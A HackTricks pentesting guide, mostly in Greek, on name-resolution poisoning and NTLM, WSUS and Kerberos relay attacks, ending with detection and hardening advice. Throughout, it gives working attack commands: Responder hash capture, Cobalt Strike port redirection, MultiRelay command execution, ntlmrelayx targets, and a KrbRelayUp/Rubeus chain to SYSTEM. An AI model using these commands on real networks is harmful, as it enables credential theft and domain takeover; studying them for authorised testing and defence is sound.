HackTricksSpoofing LLMNR, NBT-NS, mDNS/DNS and WPAD and Relay Attacks
Tip
Μάθετε & εξασκηθείτε στο AWS Hacking:
HackTricks Training AWS Red Team Expert (ARTE)
Μάθετε & εξασκηθείτε στο GCP Hacking:HackTricks Training GCP Red Team Expert (GRTE)
HackTricks Training Azure Red Team Expert (AzRTE)
Υποστηρίξτε το HackTricks
- Ελέγξτε τα σχέδια συνδρομής!
- Εγγραφείτε στην 💬 ομάδα Discord ή στην ομάδα telegram ή ακολουθήστε μας στο Twitter 🐦 @hacktricks_live.
- Μοιραστείτε κόλπα hacking υποβάλλοντας PRs στα HackTricks και HackTricks Cloud github repos.
Πρωτόκολλα Δικτύου
Τοπικά Πρωτόκολλα Επίλυσης Ονομάτων
- LLMNR, NBT-NS, and mDNS:
- Τα Microsoft και άλλα λειτουργικά συστήματα χρησιμοποιούν LLMNR και NBT-NS για την τοπική επίλυση ονομάτων όταν το DNS αποτυγχάνει. Ομοίως, τα Apple και Linux συστήματα χρησιμοποιούν mDNS.
- Αυτά τα πρωτόκολλα είναι ευάλωτα σε υποκλοπή και spoofing λόγω της μη-επιβεβαιωμένης, broadcast φύσης τους μέσω UDP.
- Τα Responder και Dementor μπορούν να χρησιμοποιηθούν για να υποδυθούν υπηρεσίες στέλνοντας ψεύτικες απαντήσεις σε hosts που κάνουν query σε αυτά τα πρωτόκολλα.
- Further information on service impersonation using Responder can be found here.
Web Proxy Auto-Discovery Protocol (WPAD)
- Το WPAD επιτρέπει στους browsers να εντοπίζουν αυτόματα τις ρυθμίσεις proxy.
- Η ανακάλυψη διευκολύνεται μέσω DHCP, DNS, ή fallback σε LLMNR και NBT-NS αν το DNS αποτύχει.
- Το Responder μπορεί να αυτοματοποιήσει επιθέσεις WPAD, κατευθύνοντας clients σε κακόβουλους WPAD servers.
Responder/Dementor για Protocol Poisoning
-
Responder είναι ένα εργαλείο που χρησιμοποιείται για poisoning σε LLMNR, NBT-NS και mDNS queries, απαντώντας επιλεκτικά με βάση τον τύπο του query, κυρίως στοχεύοντας υπηρεσίες SMB.
-
Έρχεται προεγκατεστημένο σε Kali Linux, ρυθμιζόμενο στο
/etc/responder/Responder.conf. -
Το Responder εμφανίζει τα captured hashes στην οθόνη και τα αποθηκεύει στον κατάλογο
/usr/share/responder/logs. -
Υποστηρίζει τόσο IPv4 όσο και IPv6.
-
Windows version of Responder is available here.
-
Dementor επεκτείνει τα θέματα multicast poisoning και επιπλέον δρα ως rogue service provider (συμπεριλαμβανομένης υποστήριξης CUPS RCE)
-
Η συνολική δομή είναι παρόμοια με Responder με πιο λεπτομερή configuration. (default is here: Dementor.toml)
-
Compatibility between Dementor and Responder is given here: Compatibility Matrix
-
Intro and Documentation here: Dementor - Docs
-
Διορθώνει προβλήματα capture που εισήγαγε το Responder σε ορισμένα πρωτόκολλα
Εκτέλεση Responder
- Για να τρέξετε Responder με default ρυθμίσεις:
responder -I <Interface> - Για πιο επιθετικό probing (με πιθανά side effects):
responder -I <Interface> -P -r -v - Τεχνικές για να καταγράψετε NTLMv1 challenges/responses για ευκολότερο cracking:
responder -I <Interface> --lm --disable-ess - Η impersonation του WPAD μπορεί να ενεργοποιηθεί με:
responder -I <Interface> --wpad - NetBIOS requests μπορούν να λυθούν στην IP του attacker και να στηθεί authentication proxy:
responder.py -I <interface> -Pv
Εκτέλεση Dementor
- Με τις default ρυθμίσεις:
Dementor -I <interface> - Με default ρυθμίσεις σε analysis mode:
Dementor -I <interface> -A - Αυτόματη NTLM session downgrade (ESS):
Dementor -I <interface> -O NTLM.ExtendedSessionSecurity=Off - Εκτέλεση τρέχουσας συνεδρίας με custom config:
Dementor -I <interface> --config <file.toml>
DHCP Poisoning with Responder
- Το spoofing των DHCP απαντήσεων μπορεί να δηλητηριάσει μόνιμα τις ρυθμίσεις δρομολόγησης ενός θύματος, προσφέροντας μια πιο stealthy εναλλακτική από το ARP poisoning.
- Απαιτεί ακριβή γνώση της διαμόρφωσης του στοχευόμενου δικτύου.
- Εκτέλεση της επίθεσης:
./Responder.py -I eth0 -Pdv - Αυτή η μέθοδος μπορεί να συλλάβει αποτελεσματικά NTLMv1/2 hashes, αλλά απαιτεί προσεκτικό χειρισμό για να αποφευχθεί διατάραξη του δικτύου.
Capturing Credentials with Responder/Dementor
- Το Responder/Dementor θα υποδυθεί υπηρεσίες χρησιμοποιώντας τα παραπάνω πρωτόκολλα, καταγράφοντας διαπιστευτήρια (συνήθως NTLMv2 Challenge/Response) όταν ένας χρήστης προσπαθεί να authenticate έναντι των spoofed υπηρεσιών.
- Μπορούν να γίνουν προσπάθειες για downgrade σε NetNTLMv1 ή απενεργοποίηση ESS για ευκολότερο cracking των διαπιστευτηρίων.
Είναι κρίσιμο να σημειωθεί ότι η χρήση αυτών των τεχνικών πρέπει να γίνεται νόμιμα και ηθικά, εξασφαλίζοντας τη σωστή εξουσιοδότηση και αποφεύγοντας διακοπή ή μη εξουσιοδοτημένη πρόσβαση.
Inveigh
Inveigh είναι ένα εργαλείο για penetration testers και red teamers, σχεδιασμένο για συστήματα Windows. Προσφέρει λειτουργίες παρόμοιες με το Responder, πραγματοποιώντας spoofing και man-in-the-middle επιθέσεις. Το εργαλείο εξελίχθηκε από ένα PowerShell script σε ένα C# binary, με Inveigh και InveighZero ως τις κύριες εκδόσεις. Λεπτομερείς παράμετροι και οδηγίες υπάρχουν στο wiki.
Inveigh can be operated through PowerShell:
Invoke-Inveigh -NBNS Y -ConsoleOutput Y -FileOutput Y
Ή εκτελεσμένο ως C# binary:
Inveigh.exe
NTLM Relay Attack
Αυτή η επίθεση αξιοποιεί τις SMB authentication sessions για να αποκτήσει πρόσβαση σε έναν στοχευόμενο υπολογιστή, παραχωρώντας system shell σε περίπτωση επιτυχίας. Βασικές προαπαιτήσεις περιλαμβάνουν:
- Ο χρήστης που αυθεντικοποιείται πρέπει να έχει Local Admin πρόσβαση στον relayed host.
- SMB signing πρέπει να είναι απενεργοποιημένο.
445 Port Forwarding and Tunneling
Σε περιπτώσεις όπου η άμεση εισαγωγή στο δίκτυο δεν είναι εφικτή, η κίνηση στο port 445 πρέπει να προωθηθεί και να τονελαριστεί. Εργαλεία όπως PortBender βοηθούν στην ανακατεύθυνση της κίνησης του port 445 σε άλλη θύρα, κάτι που είναι απαραίτητο όταν υπάρχει local admin access για driver loading.
Ρύθμιση και λειτουργία του PortBender στο Cobalt Strike:
Cobalt Strike -> Script Manager -> Load (Select PortBender.cna)
beacon> cd C:\Windows\system32\drivers # Navigate to drivers directory
beacon> upload C:\PortBender\WinDivert64.sys # Upload driver
beacon> PortBender redirect 445 8445 # Redirect traffic from port 445 to 8445
beacon> rportfwd 8445 127.0.0.1 445 # Route traffic from port 8445 to Team Server
beacon> socks 1080 # Establish a SOCKS proxy on port 1080
# Termination commands
beacon> jobs
beacon> jobkill 0
beacon> rportfwd stop 8445
beacon> socks stop
Άλλα εργαλεία για NTLM Relay Attack
- Metasploit: Μπορεί να ρυθμιστεί με proxies και λεπτομέρειες για local και remote hosts.
- smbrelayx: Ένα Python script για relaying SMB sessions και εκτέλεση εντολών ή ανάπτυξη backdoors.
- MultiRelay: Ένα εργαλείο από τη σουίτα Responder για relay συγκεκριμένων χρηστών ή όλων των χρηστών, εκτέλεση εντολών, ή dump hashes.
Κάθε εργαλείο μπορεί να ρυθμιστεί να λειτουργεί μέσω SOCKS proxy αν είναι απαραίτητο, επιτρέποντας επιθέσεις ακόμη και με έμμεση πρόσβαση στο δίκτυο.
Λειτουργία MultiRelay
Το MultiRelay εκτελείται από τον κατάλογο /usr/share/responder/tools, στοχεύοντας συγκεκριμένες διευθύνσεις IP ή χρήστες.
python MultiRelay.py -t <IP target> -u ALL # Relay all users
python MultiRelay.py -t <IP target> -u ALL -c whoami # Execute command
python MultiRelay.py -t <IP target> -u ALL -d # Dump hashes
# Proxychains for routing traffic
Αυτά τα εργαλεία και τεχνικές αποτελούν ένα πλήρες σύνολο για τη διεξαγωγή NTLM Relay attacks σε διάφορα δίκτυα.
Κατάχρηση του WSUS HTTP (8530) για NTLM Relay προς LDAP/SMB/AD CS (ESC8)
Οι πελάτες WSUS αυθεντικοποιούνται στον server ενημερώσεων τους χρησιμοποιώντας NTLM πάνω από HTTP (8530) ή HTTPS (8531). Όταν το HTTP είναι ενεργοποιημένο, οι περιοδικές επικοινωνίες ελέγχου των πελατών μπορούν να εξαναγκαστούν ή να υποκλαπούν στο τοπικό τμήμα και να αναμεταδοθούν με ntlmrelayx σε LDAP/LDAPS/SMB ή σε AD CS HTTP endpoints (ESC8) χωρίς να σπάσει κανένα hash. Αυτό εναρμονίζεται με την κανονική κίνηση ενημερώσεων και συχνά αποφέρει αυθεντικοποιήσεις λογαριασμών μηχανής (HOST$).
Τι να ψάξετε
- Διαμόρφωση GPO/registry κάτω από HKLM\SOFTWARE\Policies\Microsoft\Windows\WindowsUpdate και …\WindowsUpdate\AU:
- WUServer (π.χ., http://wsus.domain.local:8530)
- WUStatusServer (URL αναφοράς)
- UseWUServer (1 = WSUS; 0 = Microsoft Update)
- DetectionFrequencyEnabled και DetectionFrequency (ώρες)
- WSUS SOAP endpoints που χρησιμοποιούν οι clients μέσω HTTP:
- /ClientWebService/client.asmx (approvals)
- /ReportingWebService/reportingwebservice.asmx (status)
- Προεπιλεγμένες θύρες: 8530/tcp (HTTP), 8531/tcp (HTTPS)
Αναγνώριση
- Χωρίς αυθεντικοποίηση
- Σάρωση για listeners: nmap -sSVC -Pn –open -p 8530,8531 -iL
- Υποκλέψτε την HTTP WSUS κίνηση μέσω L2 MITM και καταγράψτε ενεργούς clients/endpoints με wsusniff.py (μόνο HTTP εκτός αν μπορείτε να κάνετε τους clients να εμπιστευτούν το TLS cert σας).
- Με αυθεντικοποίηση
- Αναλύστε τα SYSVOL GPOs για κλειδιά WSUS με MANSPIDER + regpol (το wrapper wsuspider.sh συνοψίζει WUServer/WUStatusServer/UseWUServer).
- Εκτελέστε queries σε endpoints σε μεγάλη κλίμακα από hosts (NetExec) ή τοπικά:
nxc smb
-u -p -M reg-query -o PATH=“HKLM\SOFTWARE\Policies\Microsoft\Windows\WindowsUpdate” KEY=“WUServer” reg query HKLM\Software\Policies\Microsoft\Windows\WindowsUpdate
Βήματα end-to-end για HTTP relay
-
Τοποθετηθείτε για MITM (ίδιο L2) ώστε ένας client να επιλύει τον WSUS server σε εσάς (ARP/DNS poisoning, Bettercap, mitm6, κ.λπ.). Παράδειγμα με arpspoof: arpspoof -i
-t <wsus_client_ip> <wsus_server_ip> -
Ανακατευθύνετε την πόρτα 8530 στον relay listener σας (προαιρετικό, βολικό): iptables -t nat -A PREROUTING -p tcp –dport 8530 -j REDIRECT –to-ports 8530 iptables -t nat -L PREROUTING –line-numbers
-
Ξεκινήστε ntlmrelayx με τον HTTP listener (απαιτεί υποστήριξη Impacket για HTTP listener; δείτε τα PRs παρακάτω): ntlmrelayx.py -t ldap://
-smb2support -socks –keep-relaying –http-port 8530
Άλλοι κοινοί στόχοι:
- Relay σε SMB (αν το signing είναι απενεργοποιημένο) για exec/dump: -t smb://
- Relay σε LDAPS για αλλαγές καταλόγου (π.χ., RBCD): -t ldaps://
- Relay σε AD CS web enrollment (ESC8) για την έκδοση cert και στη συνέχεια αυθεντικοποίηση μέσω Schannel/PKINIT:
ntlmrelayx.py –http-port 8530 -t http://
/certsrv/certfnsh.asp –adcs –no-http-server Για πιο βαθιές διαδρομές κατάχρησης AD CS και εργαλεία, δείτε τη σελίδα AD CS:
-
Προκαλέστε έναν client check-in ή περιμένετε τον προγραμματισμό. Από έναν client: wuauclt.exe /detectnow or use the Windows Update UI (Check for updates).
-
Χρησιμοποιήστε τις αυθεντικοποιημένες SOCKS συνεδρίες (αν -socks) ή τα άμεσα αποτελέσματα του relay για post-exploitation (αλλαγές LDAP, SMB λειτουργίες, ή έκδοση πιστοποιητικού AD CS για μετέπειτα αυθεντικοποίηση).
Περιορισμός HTTPS (8531)
- Η παθητική υποκλοπή του WSUS πάνω από HTTPS είναι αναποτελεσματική εκτός αν οι clients εμπιστεύονται το πιστοποιητικό σας. Χωρίς ένα εμπιστευμένο πιστοποιητικό ή άλλη παράβαση TLS, το NTLM handshake δεν μπορεί να συλλεχθεί/αναμεταδοθεί από την WSUS HTTPS κίνηση.
Σημειώσεις
- Το WSUS ανακοινώθηκε ότι θα αποσυρθεί αλλά παραμένει ευρέως αναπτυγμένο· το HTTP (8530) είναι ακόμη κοινό σε πολλά περιβάλλοντα.
- Χρήσιμα βοηθητικά: wsusniff.py (παρατήρηση HTTP WSUS check-ins), wsuspider.sh (αρίθμηση WUServer/WUStatusServer από GPOs), NetExec reg-query σε κλίμακα.
- Το Impacket επανέφερε την υποστήριξη HTTP listener για ntlmrelayx στο PR #2034 (πρωτότυπα προστέθηκε στο PR #913).
Εξαναγκασμός NTLM Συνδέσεων
Στα Windows ίσως να μπορείτε να εξαναγκάσετε ορισμένους προνομιακούς λογαριασμούς να αυθεντικοποιηθούν σε αυθαίρετες μηχανές. Διαβάστε την ακόλουθη σελίδα για να μάθετε πώς:
Force NTLM Privileged Authentication
Kerberos Relay attack
Μια Kerberos relay attack κλέβει ένα AP-REQ ticket από μια υπηρεσία και το ξαναχρησιμοποιεί εναντίον μιας δεύτερης υπηρεσίας που μοιράζεται το ίδιο κλειδί λογαριασμού μηχανής (επειδή και τα δύο SPNs καθίστανται στον ίδιο λογαριασμό μηχανής $). Αυτό λειτουργεί ακόμα κι αν οι κλάσεις υπηρεσιών διαφέρουν (π.χ. CIFS/ → LDAP/) επειδή το κλειδί που αποκρυπτογραφεί το ticket είναι το NT hash της μηχανής, όχι το ίδιο το SPN string και το SPN string δεν είναι μέρος της υπογραφής.
Σε αντίθεση με NTLM relay, το hop περιορίζεται στον ίδιο host αλλά, αν στοχεύσετε ένα πρωτόκολλο που σας επιτρέπει να γράψετε σε LDAP, μπορείτε να αλυσοδέσετε σε Resource-Based Constrained Delegation (RBCD) ή AD CS enrollment και να αποκτήσετε NT AUTHORITY\SYSTEM με ένα μόνο βήμα.
Για λεπτομερείς πληροφορίες για αυτή την επίθεση δείτε:
-
https://googleprojectzero.blogspot.com/2021/10/using-kerberos-for-authentication-relay.html
-
https://decoder.cloud/2025/04/24/from-ntlm-relay-to-kerberos-relay-everything-you-need-to-know/
-
- Kerberos basics
| Token | Σκοπός | Σχετικότητα για relay |
|---|---|---|
| TGT / AS-REQ ↔ REP | Αποδεικνύει τον χρήστη στο KDC | παραμένει αμετάβλητο |
| Service ticket / TGS-REQ ↔ REP | Δεσμευμένο σε ένα SPN; κρυπτογραφημένο με το κλειδί του ιδιοκτήτη του SPN | μπορούν να ανταλλαχθούν αν τα SPNs μοιράζονται λογαριασμό |
| AP-REQ | Ο client στέλνει TGS στην υπηρεσία | αυτό που κλέβουμε και αναπαράγουμε |
- Τα tickets κρυπτογραφούνται με το κλειδί που προκύπτει από τον κωδικό του λογαριασμού που κατέχει το SPN.
- Ο Authenticator μέσα στο AP-REQ έχει σήμανση χρόνου 5 λεπτών· η αναπαραγωγή εντός αυτού του παραθύρου είναι έγκυρη μέχρι η cache της υπηρεσίας να δει ένα αντίγραφο.
- Τα Windows σπάνια ελέγχουν αν το SPN string στο ticket ταιριάζει με την υπηρεσία που στοχεύετε, οπότε ένα ticket για
CIFS/HOSTσυνήθως αποκρυπτογραφείται σωστά σεLDAP/HOST.
-
- Τι πρέπει να ισχύει για να γίνει relay Kerberos
- Κοινό κλειδί: τα source και target SPNs ανήκουν στον ίδιο λογαριασμό μηχανής (προεπιλογή σε Windows servers).
- Καμία προστασία καναλιού: SMB/LDAP signing απενεργοποιημένο και EPA απενεργοποιημένο για HTTP/LDAPS.
- Μπορείτε να υποκλέψετε ή να εξαναγκάσετε αυθεντικοποίηση: LLMNR/NBNS poison, DNS spoof, PetitPotam / DFSCoerce RPC, fake AuthIP, rogue DCOM, κ.λπ..
- Η πηγή του ticket να μην έχει ήδη χρησιμοποιηθεί: πρέπει να κερδίσετε τη ‘κούρσα’ πριν φτάσει το πραγματικό πακέτο ή να το μπλοκάρετε εντελώς· αλλιώς η cache αναπαραγωγής του server θα δημιουργήσει Event 4649.
- Πρέπει κάπως να μπορείτε να πραγματοποιήσετε ένα MitM στην επικοινωνία — ίσως να είστε μέλος της ομάδας DNSAmins για να τροποποιήσετε το DNS του domain ή να μπορείτε να αλλάξετε το HOST file του θύματος.
Kerberos Relay Steps
- 3.1 Αναγνώριση του host
# find servers where HTTP, LDAP or CIFS share the same machine account
Get-ADComputer -Filter * -Properties servicePrincipalName |
Where-Object {$_.servicePrincipalName -match '(HTTP|LDAP|CIFS)'} |
Select Name,servicePrincipalName
- 3.2 Ξεκινήστε τον relay listener
# one-click local SYSTEM via RBCD
.\KrbRelayUp.exe relay --spn "ldap/DC01.lab.local" --method rbcd --clsid 90f18417-f0f1-484e-9d3c-59dceee5dbd8
KrbRelayUp ενσωματώνει KrbRelay → LDAP → RBCD → Rubeus → SCM bypass σε ένα binary.
- 3.3 Coerce Kerberos auth
# coerce DC to auth over SMB with DFSCoerce
.\dfscoerce.exe --target \\DC01.lab.local --listener 10.0.0.50
DFSCoerce αναγκάζει τον DC να στείλει σε εμάς ένα Kerberos CIFS/DC01 ticket.
- 3.4 Μεταβίβαση του AP-REQ
KrbRelay εξάγει το GSS blob από SMB, το επαναπακετάρει σε ένα LDAP bind, και το προωθεί στο ldap://DC01—η αυθεντικοποίηση επιτυγχάνει επειδή το ίδιο κλειδί το αποκρυπτογραφεί.
- 3.5 Κατάχρηση LDAP ➜ RBCD ➜ SYSTEM
# (auto inside KrbRelayUp) manual for clarity
New-MachineAccount -Name "FAKE01" -Password "P@ss123"
KrbRelay.exe -spn ldap/DC01 -rbcd FAKE01_SID
Rubeus s4u /user:FAKE01$ /rc4:<hash> /impersonateuser:administrator /msdsspn:HOST/DC01 /ptt
SCMUACBypass.exe
Τώρα έχετε στην κατοχή σας NT AUTHORITY\SYSTEM.
Περισσότερες διαδρομές που αξίζει να γνωρίζετε
| Διαδρομή | Τεχνική | Γιατί έχει σημασία |
|---|---|---|
| AuthIP / IPSec | Ο ψεύτικος server στέλνει ένα GSS-ID payload με οποιοδήποτε SPN; ο client κατασκευάζει ένα AP-REQ απευθείας σε εσάς | Λειτουργεί ακόμα και ανάμεσα σε subnets; machine creds από προεπιλογή |
| DCOM / MSRPC | Ο κακόβουλος OXID resolver αναγκάζει τον client να auth σε οποιοδήποτε SPN και port | Καθαρή τοπική priv-esc; παρακάμπτει firewall |
| AD CS Web Enroll | Relay το machine ticket στο HTTP/CA και πάρε ένα cert, μετά PKINIT για να δημιουργήσεις TGTs | Παρακάμπτει τις άμυνες LDAP signing |
| Shadow Credentials | Εγγραφή msDS-KeyCredentialLink, μετά PKINIT με πλαστό key pair | Δεν χρειάζεται να προσθέσεις computer account |
Αντιμετώπιση προβλημάτων
| Σφάλμα | Σημασία | Διόρθωση |
|---|---|---|
KRB_AP_ERR_MODIFIED | Ticket key ≠ target key | Λάθος host/SPN |
KRB_AP_ERR_SKEW | Ο χρόνος έχει απόκλιση > 5 min | Συγχρόνισε το ρολόι ή χρησιμοποίησε w32tm |
| LDAP bind fails | Signing enforced | Χρησιμοποίησε AD CS path ή απενεργοποίησε το signing |
| Event 4649 spam | Η υπηρεσία είδε duplicate Authenticator | Μπλόκαρε ή κάνε race το αρχικό πακέτο |
Ανίχνευση
- Αύξηση σε Event 4769 για
CIFS/,HTTP/,LDAP/από την ίδια πηγή μέσα σε λίγα δευτερόλεπτα. - Event 4649 στην υπηρεσία υποδεικνύει ανίχνευση replay.
- Kerberos logon από 127.0.0.1 (relay προς local SCM) είναι ιδιαίτερα ύποπτος—χαρτογράφησε μέσω Sigma rule στα KrbRelayUp docs.
- Παρακολούθησε αλλαγές στα attributes
msDS-AllowedToActOnBehalfOfOtherIdentityήmsDS-KeyCredentialLink.
Σκληρυνση
- Εφαρμόστε LDAP & SMB signing + EPA σε κάθε server.
- Διαίρεση SPNs ώστε το HTTP να μην είναι στον ίδιο account με CIFS/LDAP.
- Patch στα coercion vectors (PetitPotam KB5005413, DFS, AuthIP).
- Ορίστε
ms-DS-MachineAccountQuota = 0για να σταματήσετε rogue computer joins. - Ειδοποιήστε για Event 4649 και απρόσμενα loopback Kerberos logons.
References
- https://intrinium.com/smb-relay-attack-tutorial/
- https://www.4armed.com/blog/llmnr-nbtns-poisoning-using-responder/
- https://www.notsosecure.com/pwning-with-responder-a-pentesters-guide/
- https://intrinium.com/smb-relay-attack-tutorial/
- https://byt3bl33d3r.github.io/practical-guide-to-ntlm-relaying-in-2017-aka-getting-a-foothold-in-under-5-minutes.html
- WSUS Is SUS: NTLM Relay Attacks in Plain Sight (TrustedSec)
- GoSecure – Abusing WSUS to enable NTLM relaying attacks
- Impacket PR #2034 – Restore HTTP server in ntlmrelayx
- Impacket PR #913 – HTTP relay support
- WSUScripts – wsusniff.py
- WSUScripts – wsuspider.sh
- MS-WSUSOD – Windows Server Update Services: Server-to-Client Protocol
- Microsoft – WSUS deprecation announcement
Tip
Μάθετε & εξασκηθείτε στο AWS Hacking:
Μάθετε & εξασκηθείτε στο GCP Hacking:Υποστηρίξτε το HackTricks
- Ελέγξτε τα σχέδια συνδρομής!
- Εγγραφείτε στην 💬 ομάδα Discord ή στην ομάδα telegram ή ακολουθήστε μας στο Twitter 🐦 @hacktricks_live.
- Μοιραστείτε κόλπα hacking υποβάλλοντας PRs στα HackTricks και HackTricks Cloud github repos.